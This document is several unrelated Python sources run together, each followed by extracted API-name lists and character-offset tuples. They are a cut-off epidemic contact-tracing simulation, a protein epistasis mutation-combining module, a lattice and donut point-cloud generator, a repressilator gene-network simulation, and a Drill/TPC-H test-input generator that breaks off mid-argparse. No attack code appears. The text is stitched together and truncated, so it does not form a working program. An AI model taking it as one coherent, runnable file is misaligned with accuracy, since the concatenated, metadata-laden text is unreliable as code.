ax3.set_xlabel("Days")
ax4.set_xlabel("Days")
# computing Rt | calcul de Rt
for i in range(graph.stepNb):
if graph.contaminations[i] != 0 and graph.contaminations[i] > 5: # we just take into account days where there were more than 5 contaminations to reduce random fluctuations
y_Rt.append(graph.numInfectedByNewInfected[i]/graph.contaminations[i])
else:
y_Rt.append(0)
for i in range(1, graph.stepNb-1): # smoothing Rt curve
if y_Rt[i] == 0:
y_Rt[i] = (y_Rt[i-1] + y_Rt[i+1])/2
labels = [ "Symptomatic", "Deceased", "Asymptomatic","Presymptomatic", "Cured", "Healthy"]
ax.stackplot(xs, y_MS, y_D, y_MAS,y_MPS, y_G, y_S, labels=labels, edgecolor="black", colors=["red", "darkred", "orange","yellow", "dodgerblue", "mediumseagreen"])
ax.set_ylabel("Proportion of the population")
labels2 = ["In quarantine and non infected (percentage)", "In quarantine and infected (percentage)"]
ax2.stackplot(xs, y_QuarantineNonI, y_QuarantineI, labels=labels2)
ax2.set_ylabel("Proportion of the population")
#line, = ax3.plot(xs, y_InfectByASPS)
#line.set_label("Total infections by asympt.")
ax3.set_ylabel("Quarantine days / Tests")
line, = ax3.plot(xs, y_Q)
line.set_label("Cumulative quarantine days per person")
line, = ax3.plot(xs, y_QuarantineNonITotal)
line.set_label("Cumulative quarantine days of healthy people per person")
line, = ax3.plot(xs, y_TestTotal)
line.set_label("Cumulative number of tests per person")
axRt.set_ylabel("Rt", color = 'red')
line, = axRt.plot(xs, y_Rt, color = 'red')
line.set_label("Rt (average number of infections caused by one infected)")
line, = ax4.plot(xs, y_Test)
line.set_label("Number of tests (in percentage of population)")
ax4.set_ylabel("Tests")
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=3)
ax2.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1)
#ax3.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1)
ax3.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=2)
#axRt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1) #to avoid legend on top of the other
ax4.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=2)
plt.tight_layout()
def update_prob(app_use_rate, report_to_app, read_notif, warning_after_symptoms, quarantine_after_notification):
global nbIndividuals
global utilApp
global pReport
global pReadNotif
global quarantineAfterNotification
global warningAfterSymptoms
global xs, y_D, y_MS, y_MPS, y_MAS, y_S, y_G, y_Q, y_InfectByASPS, y_Rt
global y_QuarantineNonI, y_QuarantineNonITotal, y_QuarantineI, y_Test, y_TestTotal
# TODO: clarify/simplify ?
utilApp = app_use_rate
pReport = report_to_app
pReadNotif = read_notif
warningAfterSymptoms = warning_after_symptoms
quarantineAfterNotification = quarantine_after_notification
nbSteps = 60
nbIndividuals = 4000 # you may change the number of individuals for the exponential distribution graph here
graph = Graph()
init_graph_household(graph) # default graph generation using households structure, as shown in the Results section
# uncomment this to get a graph with degrees following an exponential distribution
#init_graph_exp(graph)
xs.clear()
y_D.clear()
y_MS.clear()
y_MPS.clear()
y_MAS.clear()
y_S.clear()
y_G.clear()
y_Q.clear()
y_InfectByASPS.clear()
y_QuarantineNonI.clear()
y_QuarantineNonITotal.clear()
y_QuarantineI.clear()
y_Test.clear()
y_TestTotal.clear()
y_Rt.clear()
maxSymp = 0
for step_ind in range(nbSteps):
# update matplotlib
update_viz(graph)
# update simulation
step(graph)
print(f'Progress : {(100*step_ind/nbSteps):.1f} %')
maxSymp = max(maxSymp, graph.nbS)
# print("Total individuals:", nbIndividuals)
# print("Number of deceased:", graph.nbDead)
# print("Max. nb of symptomatic people:", maxSymp)
# print("Test per people:", y_TestTotal[-1])
# print("Final healthy:", y_S[-1])
print(maxSymp/nbIndividuals,",", y_S[-1],",", y_Q[-1], ",", y_TestTotal[-1])
draw_viz(graph)
plt.show()
update_prob(utilApp, pReport, pReadNotif, warningAfterSymptoms, quarantineAfterNotification)
# interact_manual(update_prob, \
# app_use_rate = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=utilApp), \
# report_to_app = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=pReport), \
# read_notif = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=pReadNotif), \
# warning_after_symptoms = widgets.Checkbox(value=warningAfterSymptoms), \
# quarantine_after_notification = widgets.Checkbox(value=quarantineAfterNotification))
|
[
"matplotlib.pyplot.show",
"random.randint",
"random.uniform",
"numpy.random.exponential",
"matplotlib.pyplot.subplots",
"random.random",
"matplotlib.pyplot.tight_layout",
"numpy.random.lognormal"
] |
[((23541, 23577), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '[15, 10]'}), '(2, 2, figsize=[15, 10])\n', (23553, 23577), True, 'import matplotlib.pyplot as plt\n'), ((27386, 27404), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (27402, 27404), True, 'import matplotlib.pyplot as plt\n'), ((29363, 29373), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (29371, 29373), True, 'import matplotlib.pyplot as plt\n'), ((10860, 10875), 'random.random', 'random.random', ([], {}), '()\n', (10873, 10875), False, 'import random\n'), ((11860, 11905), 'numpy.random.exponential', 'np.random.exponential', (['deg_avg', 'nbIndividuals'], {}), '(deg_avg, nbIndividuals)\n', (11881, 11905), True, 'import numpy as np\n'), ((12973, 13025), 'random.randint', 'random.randint', (['household_size[0]', 'household_size[1]'], {}), '(household_size[0], household_size[1])\n', (12987, 13025), False, 'import random\n'), ((10722, 10742), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (10736, 10742), False, 'import random\n'), ((16756, 16771), 'random.random', 'random.random', ([], {}), '()\n', (16769, 16771), False, 'import random\n'), ((18402, 18417), 'random.random', 'random.random', ([], {}), '()\n', (18415, 18417), False, 'import random\n'), ((17320, 17335), 'random.random', 'random.random', ([], {}), '()\n', (17333, 17335), False, 'import random\n'), ((18459, 18474), 'random.random', 'random.random', ([], {}), '()\n', (18472, 18474), False, 'import random\n'), ((19710, 19725), 'random.random', 'random.random', ([], {}), '()\n', (19723, 19725), False, 'import random\n'), ((21401, 21416), 'random.random', 'random.random', ([], {}), '()\n', (21414, 21416), False, 'import random\n'), ((11229, 11244), 'random.random', 'random.random', ([], {}), '()\n', (11242, 11244), False, 'import random\n'), ((15466, 15481), 'random.random', 'random.random', ([], {}), '()\n', (15479, 15481), False, 'import random\n'), ((20725, 20740), 'random.random', 'random.random', ([], {}), '()\n', (20738, 20740), False, 'import random\n'), ((22013, 22028), 'random.random', 'random.random', ([], {}), '()\n', (22026, 22028), False, 'import random\n'), ((11390, 11435), 'numpy.random.lognormal', 'np.random.lognormal', (['incubMeanlog', 'incubSdlog'], {}), '(incubMeanlog, incubSdlog)\n', (11409, 11435), True, 'import numpy as np\n'), ((14640, 14655), 'random.random', 'random.random', ([], {}), '()\n', (14653, 14655), False, 'import random\n'), ((14743, 14758), 'random.random', 'random.random', ([], {}), '()\n', (14756, 14758), False, 'import random\n'), ((15727, 15772), 'numpy.random.lognormal', 'np.random.lognormal', (['incubMeanlog', 'incubSdlog'], {}), '(incubMeanlog, incubSdlog)\n', (15746, 15772), True, 'import numpy as np\n'), ((18711, 18726), 'random.random', 'random.random', ([], {}), '()\n', (18724, 18726), False, 'import random\n'), ((20360, 20375), 'random.random', 'random.random', ([], {}), '()\n', (20373, 20375), False, 'import random\n'), ((20241, 20256), 'random.random', 'random.random', ([], {}), '()\n', (20254, 20256), False, 'import random\n')]
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import Counter
import itertools
from typing import Optional, Iterable, Tuple, List
import numpy as np
import potts_model
import utils
def combine_k_rounds(num_rounds: int, mutations: Iterable[Tuple[Tuple[int, int], ...]]) -> List[Tuple[Tuple[int, int], ...]]:
"""Return the result of combining `mutations` for `num_rounds`.
Starting with a pool of M `mutations` m_1 ... m_M, stack them for K=`num_rounds` rounds. For example,
for K=3 rounds of combination, this will result in every variant (m_i + m_j + m_k), for i, j, k \\in M.
Be careful of memory usage, as this can be very large due to combinatorial possibilities.
In the best case, this scales with {M \\choose K}. But if mutations overlap at P positions,
combining them produces 1 + 2^{P} variants. So in the worst case, this will produce
{M \\choose K} * 2^{P} variants. See the definition for `utils.merge_mutation_sets` for more on
mutation merging.
Args:
num_rounds: The number of rounds of combination
mutations: The starting pool of mutations, where each mutation is an iterable of
tuples encoding mutations (position, mutation).
Returns:
A list of tuples of mutations, where each element will be a combination of
`num_rounds` mutations from `mutations`. Note that each tuple will possibly be of different lengths.
"""
if num_rounds == 0:
return list(mutations)
mutation_combinations = itertools.combinations(mutations, num_rounds + 1)
all_samples = []
for mutation_combination in mutation_combinations:
all_samples.extend(utils.merge_multiple_mutation_sets(mutation_combination))
return all_samples
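# --- Editor's sketch: rough size of the candidate pool before merging (illustrative only) ---
# combine_k_rounds enumerates itertools.combinations(mutations, num_rounds + 1), so before any
# position-overlap expansion inside utils.merge_multiple_mutation_sets the number of candidate
# combinations grows as C(M, num_rounds + 1) for M starting mutations.
import math
def candidate_pool_size(num_mutations: int, num_rounds: int) -> int:
  """Editor's helper: upper bound on combinations enumerated by combine_k_rounds (pre-merge)."""
  return math.comb(num_mutations, num_rounds + 1)
# e.g. candidate_pool_size(100, 2) == 161700, a reminder to keep `top_k` modest.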
def filter_mutation_set_by_position(mutation_sets: Iterable[Tuple[Tuple[int, int], ...]], limit: int = 10):
"""Return a filtered mutation set, where each position is used a maximum of `limit` times."""
filtered_mutation_sets = []
position_counter = Counter()
for mutation_set in mutation_sets:
positions = [m[0] for m in mutation_set]
if any([position_counter[position] >= limit for position in positions]):
continue
else:
position_counter.update(positions)
filtered_mutation_sets.append(mutation_set)
return filtered_mutation_sets
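# --- Editor's illustration (hypothetical mutation sets; not part of the original module) ---
# With limit=1, once a position appears in an accepted mutation set, every later set touching
# that position is dropped.
def _example_filter_by_position():
  example_sets = [((1, 0), (4, 2)), ((1, 3), (7, 2)), ((5, 1), (8, 0))]
  # positions 1 and 4 are claimed by the first set, so the second set (reusing position 1) is dropped
  return filter_mutation_set_by_position(example_sets, limit=1)  # -> [((1, 0), (4, 2)), ((5, 1), (8, 0))]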
def get_epistatic_seqs_for_landscape(landscape: potts_model.PottsModel,
distance: int,
n: int,
adaptive: bool = True,
max_reuse: Optional[int] = None,
top_k: Optional[int] = None,
random_state: np.random.RandomState = np.random.RandomState(0)
) -> List[np.ndarray]:
"""Return `n` variants at `distance` that are enriched for epistasis on `landscape`.
To construct epistatic sequences, the top epistatic pairs are taken directly from the landscape
epistasis tensor, and used as building blocks for higher order mutants. If `max_reuse` is set, the
top epistatic pairs are filtered greedily to only reuse the same positions `max_reuse` times.
Args:
landscape: The landscape.
distance: The number of mutations from the landscape wildtype. Raises a ValueError if not an even number.
n: The number of variants in the test set.
adaptive: When True (False), return sequences enriched for adaptive (deleterious) epistasis
max_reuse: An integer indicating the maximum number of times a position can be reused in the starting pool
of epistatic pairs.
top_k: The number of highest magnitude interactions to use for sampling. All epistatic pairs included in the
resulting variants are guaranteed to be within the `top_k` highest magnitude.
random_state: An instance of np.random.RandomState
Return:
A List of sequences.
"""
if distance % 2 != 0:
raise ValueError('Odd distance not supported.')
if not top_k:
top_k = n
mutation_pairs = utils.get_top_n_mutation_pairs(landscape.epistasis_tensor, top_k, lowest=not adaptive)
if max_reuse is not None:
assert max_reuse > 0
mutation_pairs = filter_mutation_set_by_position(mutation_pairs, limit=max_reuse)
print(f'{len(mutation_pairs)} after filtering {top_k}')
num_rounds = distance // 2
all_combined = combine_k_rounds(num_rounds, mutation_pairs)
all_combined = [element for element in all_combined if len(element) == distance]
if len(all_combined) < n:
raise ValueError(f'Not enough ({len(all_combined)} < {n}) mutants at distance {distance}, try increasing `top_k`.')
# TODO(nthomas) after switching to np.random.Generator, we can do rng.choice(all_combined)
subset_idxs = random_state.choice(len(all_combined), n, replace=False)
subset = [all_combined[i] for i in subset_idxs]
seqs = [utils.apply_mutations(landscape.wildtype_sequence, m) for m in subset]
return seqs
|
[
"utils.apply_mutations",
"numpy.random.RandomState",
"utils.merge_multiple_mutation_sets",
"itertools.combinations",
"collections.Counter",
"utils.get_top_n_mutation_pairs"
] |
[((2032, 2081), 'itertools.combinations', 'itertools.combinations', (['mutations', '(num_rounds + 1)'], {}), '(mutations, num_rounds + 1)\n', (2054, 2081), False, 'import itertools\n'), ((2514, 2523), 'collections.Counter', 'Counter', ([], {}), '()\n', (2521, 2523), False, 'from collections import Counter\n'), ((3273, 3297), 'numpy.random.RandomState', 'np.random.RandomState', (['(0)'], {}), '(0)\n', (3294, 3297), True, 'import numpy as np\n'), ((4589, 4680), 'utils.get_top_n_mutation_pairs', 'utils.get_top_n_mutation_pairs', (['landscape.epistasis_tensor', 'top_k'], {'lowest': '(not adaptive)'}), '(landscape.epistasis_tensor, top_k, lowest=\n not adaptive)\n', (4619, 4680), False, 'import utils\n'), ((5425, 5478), 'utils.apply_mutations', 'utils.apply_mutations', (['landscape.wildtype_sequence', 'm'], {}), '(landscape.wildtype_sequence, m)\n', (5446, 5478), False, 'import utils\n'), ((2178, 2234), 'utils.merge_multiple_mutation_sets', 'utils.merge_multiple_mutation_sets', (['mutation_combination'], {}), '(mutation_combination)\n', (2212, 2234), False, 'import utils\n')]
|
import numpy as np
def cubic_lattice(N):
array = np.arange(N)
xs, ys, zs = np.meshgrid(array, array, array)
return np.vstack((xs.flatten(), ys.flatten(), zs.flatten())).T
def donut(inner_r, outer_r, height=5, point_density=24, n_viewpoints=60,
offset=1e-3):
assert(isinstance(height, int))
assert(outer_r > inner_r)
# generate points on the xz-plane
def round_points(thetas):
return np.vstack([
np.cos(thetas),
np.zeros(thetas.shape[0]),
np.sin(thetas)
]).T
def rings(level_y):
thetas = np.linspace(0, 2 * np.pi, point_density + 1)[:-1]
inner = inner_r * round_points(thetas)
outer = outer_r * round_points(thetas)
inner[:, 1] = level_y
outer[:, 1] = level_y
return np.vstack((inner, outer))
point_ys = np.arange(height)
points = np.vstack([rings(level_y) for level_y in point_ys])
camera_r = (inner_r + outer_r) / 2.
camera_y = (point_ys[0] + point_ys[-1]) / 2.
# add offset to avoid division by zero at projection
thetas = np.linspace(0, 2 * np.pi, n_viewpoints + 1)[:-1] + offset
camera_locations = camera_r * round_points(thetas)
camera_locations[:, 1] = camera_y
camera_omegas = np.vstack((
np.zeros(n_viewpoints),
-thetas,
np.zeros(n_viewpoints)
)).T
return camera_omegas, camera_locations, points
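# --- Editor's usage sketch (illustrative shapes only; not part of the original module) ---
if __name__ == "__main__":
    lattice = cubic_lattice(3)
    print(lattice.shape)  # (27, 3): every integer coordinate of a 3 x 3 x 3 cube
    omegas, locations, cloud = donut(inner_r=4.0, outer_r=8.0, height=5, n_viewpoints=60)
    print(omegas.shape, locations.shape, cloud.shape)  # (60, 3) (60, 3) (240, 3)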
|
[
"numpy.meshgrid",
"numpy.zeros",
"numpy.sin",
"numpy.arange",
"numpy.linspace",
"numpy.cos",
"numpy.vstack"
] |
[((55, 67), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (64, 67), True, 'import numpy as np\n'), ((85, 117), 'numpy.meshgrid', 'np.meshgrid', (['array', 'array', 'array'], {}), '(array, array, array)\n', (96, 117), True, 'import numpy as np\n'), ((856, 873), 'numpy.arange', 'np.arange', (['height'], {}), '(height)\n', (865, 873), True, 'import numpy as np\n'), ((814, 839), 'numpy.vstack', 'np.vstack', (['(inner, outer)'], {}), '((inner, outer))\n', (823, 839), True, 'import numpy as np\n'), ((595, 639), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(point_density + 1)'], {}), '(0, 2 * np.pi, point_density + 1)\n', (606, 639), True, 'import numpy as np\n'), ((1100, 1143), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(n_viewpoints + 1)'], {}), '(0, 2 * np.pi, n_viewpoints + 1)\n', (1111, 1143), True, 'import numpy as np\n'), ((1292, 1314), 'numpy.zeros', 'np.zeros', (['n_viewpoints'], {}), '(n_viewpoints)\n', (1300, 1314), True, 'import numpy as np\n'), ((1341, 1363), 'numpy.zeros', 'np.zeros', (['n_viewpoints'], {}), '(n_viewpoints)\n', (1349, 1363), True, 'import numpy as np\n'), ((458, 472), 'numpy.cos', 'np.cos', (['thetas'], {}), '(thetas)\n', (464, 472), True, 'import numpy as np\n'), ((486, 511), 'numpy.zeros', 'np.zeros', (['thetas.shape[0]'], {}), '(thetas.shape[0])\n', (494, 511), True, 'import numpy as np\n'), ((525, 539), 'numpy.sin', 'np.sin', (['thetas'], {}), '(thetas)\n', (531, 539), True, 'import numpy as np\n')]
|
# example-3.18-repressilator.py - Transcriptional regulation
# RMM, 29 Aug 2021
#
# Figure 3.26: The repressilator genetic regulatory network. (a) A schematic
# diagram of the repressilator, showing the layout of the genes in the
# plasmid that holds the circuit as well as the circuit diagram
# (center). (b) A simulation of a simple model for the repressilator,
# showing the oscillation of the individual protein concentrations.
#
import control as ct
import numpy as np
import matplotlib.pyplot as plt
#
# Repressilator dynamics
#
# This function implements the basic model of the repressilator All
# parameter values were taken from Nature. 2000 Jan 20; 403(6767):335-8.
#
# This model was developed by members of the 2003 Synthetic Biology Class
# on Engineered Blinkers.
#
# Dynamics for the repressilator
def repressilator(t, x, u, params):
# store the state variables under more meaningful names
mRNA_cI = x[0]
mRNA_lacI = x[1]
mRNA_tetR = x[2]
protein_cI = x[3]
protein_lacI = x[4]
protein_tetR = x[5]
#
# set the parameter values
#
# set the max transcription rate in transcripts per second
k_transcription_cI = params.get('k_transcription_cI', 0.5)
k_transcription_lacI = params.get('k_transcription_lacI', 0.5)
k_transcription_tetR = params.get('k_transcription_tetR', 0.5)
# set the leakage transcription rate (ie transcription rate if
# promoter region bound by repressor) in transcripts per second
k_transcription_leakage = params.get('k_transcription_leakage', 5e-4)
# Set the mRNA and protein degradation rates (per second)
mRNA_half_life = params.get('mRNA_half_life', 120) # in seconds
k_mRNA_degradation = np.log(2)/mRNA_half_life
protein_half_life = params.get('protein_half_life', 600) # in seconds
k_protein_degradation = np.log(2)/protein_half_life
# proteins per transcript lifespan
translation_efficiency = params.get('translation_efficiency', 20)
average_mRNA_lifespan = 1/k_mRNA_degradation
# proteins per transcript per sec
k_translation = translation_efficiency/average_mRNA_lifespan
# set the Hill coefficients of the repressors
n_tetR = params.get('n_tetR', 2)
n_cI = params.get('n_cI', 2)
n_lacI = params.get('n_lacI', 2)
# Set the dissociation constant for the repressors to their target promoters
# in per molecule per second
KM_tetR = params.get('KM_tetR', 40)
KM_cI = params.get('KM_cI', 40)
KM_lacI = params.get('KM_lacI', 40)
# the differential equations governing the state variables:
# mRNA concentration = transcription given repressor concentration -
# mRNA degradation + transcription leakage
dxdt = np.empty(6)
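    # In equation form (matching the assignments below):
    #   d[mRNA_i]/dt    = k_transcription_i / (1 + ([repressor_j]/KM_j)**n_j)
    #                     - k_mRNA_degradation*[mRNA_i] + k_transcription_leakage
    #   d[protein_i]/dt = k_translation*[mRNA_i] - k_protein_degradation*[protein_i]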
dxdt[0] = k_transcription_cI/(1 + (protein_tetR / KM_tetR) ** n_tetR) - \
k_mRNA_degradation * mRNA_cI + k_transcription_leakage
dxdt[1] = k_transcription_lacI/(1 + (protein_cI / KM_cI)**n_cI) - \
k_mRNA_degradation * mRNA_lacI + k_transcription_leakage
dxdt[2] = k_transcription_tetR/(1 + (protein_lacI / KM_lacI) ** n_lacI) - \
k_mRNA_degradation * mRNA_tetR + k_transcription_leakage
# protein concentration = translation - protein degradation
dxdt[3] = k_translation*mRNA_cI - k_protein_degradation*protein_cI
dxdt[4] = k_translation*mRNA_lacI - k_protein_degradation*protein_lacI
dxdt[5] = k_translation*mRNA_tetR - k_protein_degradation*protein_tetR
return dxdt
# Define the system as an I/O system
sys = ct.NonlinearIOSystem(
updfcn=repressilator, outfcn=lambda t, x, u, params: x[3:],
states=6, inputs=0, outputs=3)
# Set up the plotting grid to match the layout in the book
fig = plt.figure(constrained_layout=True)
gs = fig.add_gridspec(2, 2)
#
# (b) A simulation of a simple model for the repressilator, showing the
# oscillation of the individual protein concentrations.
#
fig.add_subplot(gs[0, 1]) # first row, second column
# Initial conditions and time
t = np.linspace(0, 20000, 1000)
x0 = [1, 0, 0, 200, 0, 0]
# Integrate the differential equation
response = ct.input_output_response(sys, t, 0, x0)
# Plot the results (protein concentrations)
plt.plot(response.time/60, response.outputs[0], '-')
plt.plot(response.time/60, response.outputs[1], '--')
plt.plot(response.time/60, response.outputs[2], '-.')
plt.axis([0, 300, 0, 5000])
plt.legend(("cI", "lacI", "tetR"), loc='upper right')
plt.xlabel("Time [min]") # Axis labels
plt.ylabel("Proteins per cell")
plt.title("Repressilator simulation") # Plot title
# Save the figure
plt.savefig("figure-3.26-repressilator_dynamics.png", bbox_inches='tight')
|
[
"matplotlib.pyplot.title",
"control.NonlinearIOSystem",
"numpy.log",
"matplotlib.pyplot.plot",
"numpy.empty",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.figure",
"numpy.linspace",
"control.input_output_response",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] |
[((3513, 3629), 'control.NonlinearIOSystem', 'ct.NonlinearIOSystem', ([], {'updfcn': 'repressilator', 'outfcn': '(lambda t, x, u, params: x[3:])', 'states': '(6)', 'inputs': '(0)', 'outputs': '(3)'}), '(updfcn=repressilator, outfcn=lambda t, x, u, params: x\n [3:], states=6, inputs=0, outputs=3)\n', (3533, 3629), True, 'import control as ct\n'), ((3700, 3735), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'constrained_layout': '(True)'}), '(constrained_layout=True)\n', (3710, 3735), True, 'import matplotlib.pyplot as plt\n'), ((3992, 4019), 'numpy.linspace', 'np.linspace', (['(0)', '(20000)', '(1000)'], {}), '(0, 20000, 1000)\n', (4003, 4019), True, 'import numpy as np\n'), ((4096, 4135), 'control.input_output_response', 'ct.input_output_response', (['sys', 't', '(0)', 'x0'], {}), '(sys, t, 0, x0)\n', (4120, 4135), True, 'import control as ct\n'), ((4181, 4235), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[0]', '"""-"""'], {}), "(response.time / 60, response.outputs[0], '-')\n", (4189, 4235), True, 'import matplotlib.pyplot as plt\n'), ((4234, 4289), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[1]', '"""--"""'], {}), "(response.time / 60, response.outputs[1], '--')\n", (4242, 4289), True, 'import matplotlib.pyplot as plt\n'), ((4288, 4343), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[2]', '"""-."""'], {}), "(response.time / 60, response.outputs[2], '-.')\n", (4296, 4343), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4370), 'matplotlib.pyplot.axis', 'plt.axis', (['[0, 300, 0, 5000]'], {}), '([0, 300, 0, 5000])\n', (4351, 4370), True, 'import matplotlib.pyplot as plt\n'), ((4371, 4424), 'matplotlib.pyplot.legend', 'plt.legend', (["('cI', 'lacI', 'tetR')"], {'loc': '"""upper right"""'}), "(('cI', 'lacI', 'tetR'), loc='upper right')\n", (4381, 4424), True, 'import matplotlib.pyplot as plt\n'), ((4426, 4450), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time [min]"""'], {}), "('Time [min]')\n", (4436, 4450), True, 'import matplotlib.pyplot as plt\n'), ((4488, 4519), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Proteins per cell"""'], {}), "('Proteins per cell')\n", (4498, 4519), True, 'import matplotlib.pyplot as plt\n'), ((4520, 4557), 'matplotlib.pyplot.title', 'plt.title', (['"""Repressilator simulation"""'], {}), "('Repressilator simulation')\n", (4529, 4557), True, 'import matplotlib.pyplot as plt\n'), ((4600, 4674), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""figure-3.26-repressilator_dynamics.png"""'], {'bbox_inches': '"""tight"""'}), "('figure-3.26-repressilator_dynamics.png', bbox_inches='tight')\n", (4611, 4674), True, 'import matplotlib.pyplot as plt\n'), ((2731, 2742), 'numpy.empty', 'np.empty', (['(6)'], {}), '(6)\n', (2739, 2742), True, 'import numpy as np\n'), ((1723, 1732), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1729, 1732), True, 'import numpy as np\n'), ((1853, 1862), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1859, 1862), True, 'import numpy as np\n')]
|
import argparse
import re
import sys
import numpy as np
import pandas as pd
import tpch
from pydrill.client import PyDrill
def get_table_occurrences(query):
# [ y for y in a if y not in b]
return [name for name in tpch.tableNames if name in query.split()]
def replace_all(text, dic):
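    # Replace every whitespace-delimited occurrence of each key in dic
    # (here, a bare table name) with its mapped value.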
for i, j in dic.items():
text = re.sub(r"\s%s(\s|$)" % i, j, text)
return text
def get_blazingsql_query(db_name, query):
new_query = query
for table_name in get_table_occurrences(query):
new_query = replace_all(
new_query,
{table_name: " %(table)s "
% {"table": db_name + "." + table_name}},
)
return new_query
def get_drill_query(query):
new_query = query
for table_name in get_table_occurrences(query):
new_query = replace_all(
new_query,
{table_name: " dfs.tmp.`%(table)s` " % {"table": table_name}}
)
return new_query
def get_reference_input(drill, root_path, test_name, query):
table_names = get_table_occurrences(query)
table_inputs = []
for table_name in table_names:
file_path = root_path + table_name + ".psv"
table = tpch.tables[table_name]
db_name = "main"
table_inputs.append(
"""{
"dbName": "%(db_name)s",
"tableName": "%(table_name)s",
"filePath": "%(file_path)s",
"columnNames": %(column_names)s,
"columnTypes": %(column_types)s
}"""
% {
"db_name": db_name,
"table_name": table_name,
"file_path": file_path,
"column_names": get_column_names(table),
"column_types": get_column_types(table),
}
)
drill_query = get_drill_query(query)
print("\t#drill_query: ", drill_query)
return (
(
"""
{
"testName": "%(test_name)s",
"query": "%(query)s",
"tables": [%(table_inputs)s],
"result": %(result)s,
"resultTypes": %(result_types)s,
"resultColumnNames": %(result_names)s
}
"""
)
% {
"test_name": test_name,
"query": get_blazingsql_query(db_name, query),
"table_inputs": ",".join(table_inputs),
"result": get_reference_result(drill, table, drill_query),
"result_types": get_reference_result_types(drill,
table, drill_query),
"result_names": get_reference_result_names(drill,
table, drill_query),
}
)
def get_reference_result_names(drill, table, query_str):
query_result = drill.query(query_str)
return "[%s]" % (",".join(['"%s"' % name for name in
query_result.columns]))
def get_reference_result(drill, table, query_str):
query_result = drill.query(query_str)
df = query_result.to_dataframe()
items = []
for column in query_result.columns:
s = "[%s]" % (
",".join(
[
"-1"
if item is None
else "1"
if item is True
else "0"
if item is False
else item
for item in np.asarray(df[column])
]
)
)
items.append(s)
return "[%s]" % (",".join(items))
def get_reference_result_types(drill, table, query_str):
query_result = drill.query(query_str)
df = query_result.to_dataframe()
for col in query_result.columns:
df[col] = pd.to_numeric(df[col], errors="coerce")
def get_dtype(dtype):
if pd.api.types.is_categorical_dtype(dtype):
return "GDF_INT8"
dicc = {
np.float64: "GDF_FLOAT64",
np.float32: "GDF_FLOAT32",
np.int64: "GDF_INT64",
np.int32: "GDF_INT32",
np.int16: "GDF_INT16",
np.int8: "GDF_INT8",
np.bool_: "GDF_INT8",
np.datetime64: "GDF_DATE64",
np.object: "GDF_INT64",
}
_type = np.dtype(dtype).type
if _type in dicc:
return dicc[_type]
return "GDF_INT64"
return "[%s]" % (
",".join(
['"%s"' % get_dtype(df[column].dtype) for column
in query_result.columns])
)
def get_gdf_type(table, column_name):
types = {
"double": "GDF_FLOAT64",
"float": "GDF_FLOAT32",
"long": "GDF_INT64",
"int": "GDF_INT32",
"short": "GDF_INT32",
"char": "GDF_INT8",
"date": "GDF_DATE64",
}
t = table.get(column_name)
if t in types:
return types[t]
return "GDF_UNDEFINED"
def get_column_names(table):
return "[%s]" % (
",".join(
['"%s"' % _name for _name, _type in table.items()]))
def get_column_types(table):
return "[%s]" % (
",".join(
['"%s"' % gdf_type(native_type(_type)) for _name, _type
in table.items()]
)
)
def native_type(type_name): # to convert string(xyz) to string
if type_name.find("string") != -1:
return "string"
else:
return type_name
def gdf_type(type_name):
return {
"double": "GDF_FLOAT64",
"float": "GDF_FLOAT32",
"long": "GDF_INT64",
"int": "GDF_INT32",
"short": "GDF_INT32",
"char": "GDF_INT8",
"date": "GDF_INT64",
"string": "GDF_STRING",
}[type_name]
def get_selected_columns(table):
# [ y for y in a if y not in b]
return [
_name for _name,
_type in table.items() if _type.find('string') == -
1]
def write(json_list):
def to(filename):
with sys.stdout if '-' == filename else open(filename, 'w') as output:
output.write('[%s]' % (','.join([item for item in json_list])))
return type('writer', (), dict(to=to))
def generate_json_input(drill, tpch_path, your_queries, output):
print("# OUTPUT \t", output)
json_list = []
for index, query in enumerate(your_queries):
print("## processing...\t", query)
json_text = get_reference_input(drill, tpch_path,
"TEST_0%s" % index, query)
json_list.append(json_text)
write(json_list).to(output)
if __name__ == "__main__":
drill = PyDrill(host="localhost", port=8047)
if not drill.is_active():
raise Exception("Please run Drill first")
parser = argparse.ArgumentParser(
description="Generate Input Generator for UnitTestGenerator."
)
parser.add_argument(
"tpch_path", type=str, help="use complete path, ex /tmp/tpch/1mb/"
)
parser.add_argument(
